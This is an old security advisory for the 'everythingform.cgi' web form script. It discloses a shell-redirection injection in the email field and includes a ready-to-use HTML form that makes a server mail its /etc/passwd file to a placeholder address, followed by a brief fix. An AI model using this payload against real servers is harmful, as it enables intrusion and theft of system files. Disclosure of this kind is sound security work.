Content-Type: Remote Root via vulnerible CGI software
Date        : 13/08/2000
Sender      : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject     : everythingform.cgi Vulnerible CGI
X-System    : UNIX/NT systems running the everythingform.cgi CGI software
X-Status    : s1gnal_9-ADVISORY-everythingform.txt
X-Greets    : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________


PRODUCT NAME:  The EVERYTHING form [everythingform.cgi]

PRODUCT HOMEPAGE:  http://www.conservatives.net/atheist/scripts/index.html?everythingform


DESCRIPTION :   
It allows you to process an unlimited number of forms 
using only one script;  its feature's are simple, and flexible according the 
the product homepage.
This is the replacement script for the previous scripts "flexform" and "flexform_mail".

PROBLEM:
When you submit the form, it responds back to the email address that you entered, saying 
"thank you" or other data, when you put your email address in the form add " < /etc/passwd"
after your email address, and shortly you will have the /etc/passwd file in your mailbox.


EXAMPLE:
Below is a example of how we could get the /etc/passwd file off the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action=http://www.SOMESERVER.com/everythingform.cgi method=POST>
<input type=hidden name=redirect value=done.html>
<input type=hidden name=output value=blah.htm>
<input type=hidden name=required value="Name|e-mail">
E-mail: <input type=text name="e-mail" value="myaddress@blah.com < /etc/passwd"><br>
<input type=submit value="Click me to get /etc/passwd"></form>
<-------------------------CUT HERE-------------------------------------->


SOLUTION
I would rewrite a portion of the script to do input validation checking.


Please visit www.zone.ee/unix :)